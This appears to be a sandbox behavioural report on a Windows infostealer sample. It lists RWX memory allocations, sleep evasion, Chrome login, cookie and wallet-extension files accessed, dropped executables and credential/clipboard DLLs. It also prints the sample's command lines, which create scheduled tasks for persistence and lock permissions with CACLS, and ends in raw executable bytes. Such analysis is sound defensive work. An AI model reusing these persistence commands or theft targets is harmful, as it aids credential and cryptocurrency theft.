allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00586000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0058b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0058c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0056c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0058d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00588000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x079ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x079e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x079e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0057d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description rundll32.exe tried to sleep 195 seconds, actually delayed analysis time by 195 seconds
description Utsysc.exe tried to sleep 347 seconds, actually delayed analysis time by 347 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 3077565
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3077565
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3077186
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3077186
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3120608
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3120608
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3120288
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3120288
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3119848
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3119848
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3119711
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3119711
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\dfmbcapkkeejcpmfhpnglndfkgmalhik
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma~RF3a15fe.TMP
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofo
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gehmmocbbkpblljhkekmfhjpfbkclbph
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ldinpeekobnhjjdofggfgjlcehhmanlj
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhhldecdfagpbfggphklkaeiocfnaafm
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\djclckkglechooblngghdinmeemkbgci
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\dppgmdbiimibapkepcbdbmkaabgiofem
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnmbobjmhlngoefaiojfljckilhhlhcj
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\UC Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\nhhldecdfagpbfggphklkaeiocfnaafm
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ocglkepbibnalbgmbachknglpdipeoio
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acdamagkdfmpkclpoglgnbddngblgibo
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ldinpeekobnhjjdofggfgjlcehhmanlj
domain api.ipify.org
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\5Az4sH9.exe
file C:\Users\test22\AppData\Local\Temp\1000006001\1.exe
file C:\Users\test22\AppData\Local\Temp\1000009001\trafico.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\kG1Do08.exe
file C:\Users\test22\AppData\Local\Temp\EDD5.tmp\EDF6.tmp\EDF7.bat
file C:\Users\test22\AppData\Roaming\aca439ae61e801\cred64.dll
file C:\Users\test22\AppData\Local\Temp\1000081001\amers.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\dw4YC64.exe
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\tooltip[1].js
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7wT5Ey89.exe
file C:\Users\test22\AppData\Local\Temp\1000008001\abd.exe
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\yR0Hb97.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\ZC1Hg57.exe
file C:\Users\test22\AppData\Local\Temp\1000080001\haloup.exe
file C:\Users\test22\AppData\Local\Temp\1000029001\lom30.exe
file C:\Users\test22\AppData\Local\Temp\1000020001\TEST32.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\4ec216QK.exe
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\login[1].js
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\3.520a7eda.chunk[1].js
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\manifest[1].js
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\shared_global[1].js
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6Ye1nZ1.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\BD4sp82.exe
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\jquery-1.11.1.min[1].js
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\global[1].js
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\main.10a25667.chunk[1].js
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\shared_responsive_adapter[1].js
file C:\Users\test22\AppData\Local\Temp\1000027001\TEST32.exe
file C:\Users\test22\AppData\Local\Temp\IXP005.TMP\1TO62yp3.exe
file C:\Users\test22\AppData\Local\Temp\1000024001\build2.exe
file C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\main[1].js
file C:\Users\test22\AppData\Local\Temp\IXP005.TMP\2jX0103.exe
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\_combined[1].js
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\prototype-1.7[1].js
file C:\Users\test22\AppData\Roaming\aca439ae61e801\clip64.dll
file C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\libraries~b28b7af69[1].js
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\3mI23vW.exe
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
cmdline "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\EDD5.tmp\EDF6.tmp\EDF7.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7wT5Ey89.exe"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
file C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe
file C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
file C:\Users\test22\AppData\Local\Temp\1000027001\TEST32.exe
file C:\Users\test22\AppData\Local\Temp\1000009001\trafico.exe
file C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
file C:\Users\test22\AppData\Local\Temp\1000024001\build2.exe
file C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe
file C:\Users\test22\AppData\Local\Temp\1000029001\lom30.exe
file C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll
file C:\Users\test22\AppData\Roaming\aca439ae61e801\clip64.dll
file C:\Users\test22\AppData\Local\Temp\1000006001\1.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\aca439ae61e801\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\aca439ae61e801\clip64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\sysnative\cmd
parameters: /c "C:\Users\test22\AppData\Local\Temp\EDD5.tmp\EDF6.tmp\EDF7.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7wT5Ey89.exe"
filepath: C:\Windows\sysnative\cmd
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x03650000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $ƒÐà DZ­^DZ­^DZ­^Ùã8^ѱ­^Ùã)^ò±­^Ùã.^D±­^àwÖ^ű­^¾ð^ı­^DZ¬^™±­^ÎÉ)^Ʊ­^ÎÉ<^Ʊ­^RichDZ­^PELueBeà  Ê°§ð@€–ŒиH0ðP.text£¤ `.reloc‡$À&¨ `.rdatapPðRÎ@@.dataH®P @À.qbjfzаÀU‹ìƒì‰MìÆEÿ¸…ÀtÇEøë ‹Møƒé‰Møƒ}ø~ëïëí3ÒtÇEô(ë ‹Eôƒè‰Eôƒ}ô~ëïëí¹…ÉtÇEðJë ‹Uðƒê‰Uðƒ}ð~ëïëíhÈñA‹Mè<‹E‹å]ÂÌÌÌU‹ìì‰ðþÿÿhÌñA|ÿÿÿèhÐñAM¤èÝÐýAÝ]øhôñAMÀèîÝÈýAÝ]˜hòAMÜèØhdòAPÿÿÿèÈPhtòA4ÿÿÿè·PèA'ƒÄˆ…oÿÿÿ4ÿÿÿèݍPÿÿÿèÒ¶…oÿÿÿ…Àt(Džxÿÿÿ=닍xÿÿÿƒé‰xÿÿÿƒ½xÿÿÿ~ëæë亅Òt(Džtÿÿÿ)ë‹…tÿÿÿƒè‰…tÿÿÿƒ½tÿÿÿ~ëæëäh„òAÿÿÿèPh”òAøþÿÿè Pè·'ƒÄˆ…3ÿÿÿøþÿÿè3ÿÿÿè(¶3ÿÿÿ…Ét(Džpÿÿÿë‹•pÿÿÿƒê‰•pÿÿÿƒ½pÿÿÿ~ëæëäƅ÷þÿÿMÜèæMÀèލM¤è֍|ÿÿÿèˍM èÍM4車…÷þÿÿ‹å]ÂLÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQ‰MüMè‘‹å]Â8ÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì$‰MÜÝèýAÝ]øÆEçÝàýAÝ]èÝØýAÝ]ð¸…ÀtÇEà7ë ‹Màƒé‰Màƒ}à~ëïëíh¤òA‹Mèæ‹E‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìì°‰PÿÿÿÝðýAÝ]ÐÇE”ÇEüCh¸òAM˜èhØòAMÜèh@óAM´èƒÇEøhœóApÿÿÿèlPh¸óATÿÿÿè[Pè&ƒÄˆETÿÿÿ脍pÿÿÿèy¶E…ÀtÇEë ‹Mƒé‰Mƒ}~ëïëíhÔóA‹MèM´è@MÜè8M˜è0Mè(M,è ‹E‹å]ÂHÌÌÌÌÌÌÌU‹ììÀ‰@ÿÿÿÝþAÝ]ðÆEÿhàóAMÔè§ÇE„2 ÝþAÝ]Èh8ôAM¤èŠÝøýAÝ]Àh€ôAMˆèthˆôA`ÿÿÿèdPhàôADÿÿÿèSPèý$ƒÄˆ…ÿÿÿDÿÿÿèy`ÿÿÿèn¶…ÿÿÿ…ÀtÇE€Kë ‹M€ƒé‰M€ƒ}€~ëïëíh8õA‹MèúMˆè2M¤è*MÔè"‹E‹å]ÂÌÌÌÌÌÌÌÌÌU‹ìƒìd‰MœÆE÷ÇE¸ûÇE´4ÝþAÝ]àÆEïÇEðh@õAM¼è”ÇE܅ÝþAÝ]øÆEÛ¸…ÀtÇE°+ë ‹M°ƒé‰M°ƒ}°~ëïëí3ÒtÇE¬:ë ‹E¬ƒè‰E¬ƒ}¬~ëïëí3ÉtÇE¨`ë ‹U¨ƒê‰U¨ƒ}¨~ëïëí3ÀtÇE¤6ë ‹M¤ƒé‰M¤ƒ}¤~ëïëíº…ÒtÇE  ë ‹E ƒè‰E ƒ} ~ëïëíM¼è‹å]ÂÌÌÌÌÌÌÌÌU‹ìì‰ìþÿÿhlõAMÔè¤Ý þAÝ]ðh˜õAM¸èŽÆEÿhàõAM„è}Ph(öAhÿÿÿèlPè#ƒÄˆE£hÿÿÿ蕍M„荶E£…ÀtÇE´ë ‹M´ƒé‰M´ƒ}´~ëïëíhlöAHÿÿÿèPh”öA,ÿÿÿèPè²"ƒÄˆ…gÿÿÿ,ÿÿÿè.Hÿÿÿè#¶•gÿÿÿ…ÒtÇE°>ë ‹E°ƒè‰E°ƒ}°~ëïëí¹…ÉtÇE¬?ë ‹U¬ƒê‰U¬ƒ}¬~ëïëíh¼öA ÿÿÿè‡ PhäöAðþÿÿèv Pè "ƒÄˆ…+ÿÿÿðþÿÿèœ  ÿÿÿè‘ 